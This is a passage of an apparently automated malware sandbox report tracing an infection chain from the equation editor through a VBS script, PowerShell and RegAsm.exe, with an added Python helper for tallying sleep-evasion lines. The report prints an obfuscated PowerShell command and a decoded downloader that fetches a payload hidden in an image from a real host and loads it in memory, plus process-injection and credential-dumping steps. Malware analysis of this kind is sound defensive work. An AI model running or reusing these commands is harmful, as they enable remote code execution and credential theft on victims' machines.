Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep count: 8316 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep time: -24948000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020 | Thread sleep time: -120000s >= -30000s
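The sleep evidence above is easier to reason about as per-thread totals than as a list of raw lines. The following is an added triage helper written for this page (it is not Joe Sandbox output and not code from the sample): it parses the report's own "Thread sleep time" / "Thread sleep count" entries and classifies each thread. Two readings are assumptions and are stated in the code: the report suffixes the sleep totals with "s", but the same values appear as millisecond "delay time" entries (600000 = ten minutes) and RegAsm's totals are exactly count x 3000 ms, so totals are treated as milliseconds; and repeated lines for one TID look like cumulative snapshots (RegAsm TID 2760 reports 1660 calls / 4980000 ms and later 8316 / 24948000), so the maximum per thread is kept rather than the sum. The value 922337203685477 is [TimeSpan]::MaxValue in milliseconds (Int64.MaxValue ticks / 10000), a wait that never returns, which is what "Delayed program exit found" is flagging. SAMPLE_LINES is constructed by copying lines from this report; the five-minute run budget is an assumption.

```python
"""Added example for this page (not part of the Joe Sandbox report, not malware
code): reduce the report's 'Thread sleep' evidence lines to per-thread figures.

Assumptions: sleep totals are milliseconds (see the lead-in); repeated lines for
one TID are cumulative snapshots, so maxima are kept; a sandbox run is ~5 min.
"""
import re
from collections import defaultdict

TIMESPAN_MAX_MS = (2**63 - 1) // 10_000     # 922337203685477: [TimeSpan]::MaxValue in ms
LONG_SLEEP_MS = 30_000                      # the report's own threshold (">= -30000s")
RUN_BUDGET_MS = 5 * 60 * 1000               # assumption: a five-minute analysis run

# Accepts the lines with or without the ' | ' column separator.
LINE_RE = re.compile(
    r"Source: (?P<image>.+?) TID: (?P<tid>\d+)\s*\|?\s*Thread sleep "
    r"(?:time: -(?P<ms>\d+)s|count: (?P<count>\d+))"
)

# CONSTRUCTED input: lines copied in shape and values from this report.
SAMPLE_LINES = r"""
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3128 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep count: 1562 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep count: 3905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep count: 1660 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep time: -4980000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep count: 8316 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep time: -24948000s >= -30000s
"""


def parse(lines: str) -> dict:
    """Map (image basename, tid) -> {'total_ms': int, 'calls': int}, keeping maxima."""
    stats = defaultdict(lambda: {"total_ms": 0, "calls": 0})
    for line in lines.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["image"].rsplit("\\", 1)[-1], int(m["tid"]))
        if m["ms"]:
            stats[key]["total_ms"] = max(stats[key]["total_ms"], int(m["ms"]))
        if m["count"]:
            stats[key]["calls"] = max(stats[key]["calls"], int(m["count"]))
    return dict(stats)


def classify(entry: dict) -> str:
    """Verdict string for one thread, checked from most to least damning."""
    total, calls = entry["total_ms"], entry["calls"]
    if total >= TIMESPAN_MAX_MS:
        # e.g. 5534023222112862 = 6 x TimeSpan.MaxValue: six 'sleep forever' waits
        return f"infinite-wait x{total // TIMESPAN_MAX_MS}"
    if total >= RUN_BUDGET_MS:
        return f"stall {total / 60000:.1f} min (outlives the run)"
    if total >= LONG_SLEEP_MS:
        return f"long sleep {total / 60000:.1f} min"
    if calls > 30:
        return f"sleep-loop {calls} calls"
    return "unremarkable"


def report(lines: str) -> list[str]:
    """One line per thread, worst first, suitable for a triage note."""
    stats = parse(lines)
    order = sorted(stats.items(), key=lambda kv: (-kv[1]["total_ms"], -kv[1]["calls"]))
    return [f"{img} TID {tid}: {classify(e)}" for (img, tid), e in order]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LINES)))
```

Run it on a report's sleep lines and the "infinite-wait" and "stall" verdicts identify the threads that would outlive any sandbox, which is what the "Delayed program exit found" and sleep-evasion signatures are summarizing.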
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_10006580 FindFirstFileExA,14_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00443355 mov eax, dword ptr fs:[00000030h] 14_2_00443355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h] 14_2_10004AB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411D39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00434BD8 SetUnhandledExceptionFilter,14_2_00434BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0043503C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 14_2_00412132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00419662 mouse_event,14_2_00419662
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...' (the same truncated, obfuscated base64 command line as shown earlier in this section)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? 
